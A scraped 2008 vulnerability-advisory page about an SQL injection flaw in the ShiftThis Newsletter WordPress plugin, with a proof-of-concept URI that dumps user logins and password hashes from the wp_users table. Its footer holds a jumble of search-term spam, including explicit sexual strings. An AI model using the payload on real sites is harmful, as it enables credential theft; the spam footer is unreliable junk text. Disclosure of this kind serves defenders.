about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , WordPress Plugin ShiftThis Newsletter SQL Injection Vulnerability


Title WordPress Plugin ShiftThis Newsletter SQL Injection Vulnerability
Published 2008-02-03-12:00AM
Updated 2008-02-04-09:27PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  S@BUN discovered this vulnerability.
Vulnerable  ShiftThis ShiftThis Newsletter 0
Not Vulnerable  
Code  An attacker can exploit this issue via a browser.The following proof-of-concept URI is available:http://www.example.com/wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 19:25:51 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.teen.s FILMSX-18A xxx sexy n tamil girl www.dubais www.bootyt www..homos Pelajar pe nadine jan zoosex.com t410t SEXI MOVEI crushspot fukln Sakeela www,sexlad www.bolly zoosex.com CMS is Fre sex arabec vm-pop3d 1 galerisex 3-pic.com ws2 Searching Sex foto sex bangbr wwww89com Sexvideo.C sexy vedio Powered By www.xxx.co porno Sex foto Activesex modifyform t410t lambo sabita bha n57.php Simrancury www.masque Www.school couple hav www.pakist tuvalu shame sham www.xxx.co security.d www.sexpic